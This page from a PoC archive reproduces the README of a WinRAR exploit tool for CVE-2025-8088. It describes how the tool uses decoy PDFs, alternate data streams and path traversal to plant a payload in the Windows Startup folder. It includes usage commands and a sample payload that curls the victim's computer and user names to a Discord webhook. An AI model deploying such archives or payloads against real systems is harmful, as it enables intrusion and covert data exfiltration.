Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-8088 PoC — Path traversal vulnerability in WinRAR

Source
https://github.com/techcorp/CVE-2025-8088-Exploit
Associated Vulnerability
Title:Path traversal vulnerability in WinRAR (CVE-2025-8088)
Description:A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.
Description
A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.
Readme
# CVE-2025-8088 WinRAR Exploit 🔓

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory. 

<p align="center">
  <img src="https://github.com/pentestfunctions/best-CVE-2025-8088/blob/main/assets/winrar_exploit.gif?raw=true">
</p>

## 🚀 How It Works

1. Creates a Decoy Document 📄 - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088-Exploit.py
```
## ✏️ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
- ReportLab library (pip install reportlab)
File Snapshot

 [4.0K]  /data/pocs/25736cf59e07314dd3d1fcda303a1364d23a0bb0
├── [4.0K]  assets
│   ├── [   1]  info.md
│   └── [7.8M]  winrar_exploit.gif
├── [ 29K]  CVE-2025-8088.py
├── [2.0K]  README.md
└── [  18]  requirements.txt

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →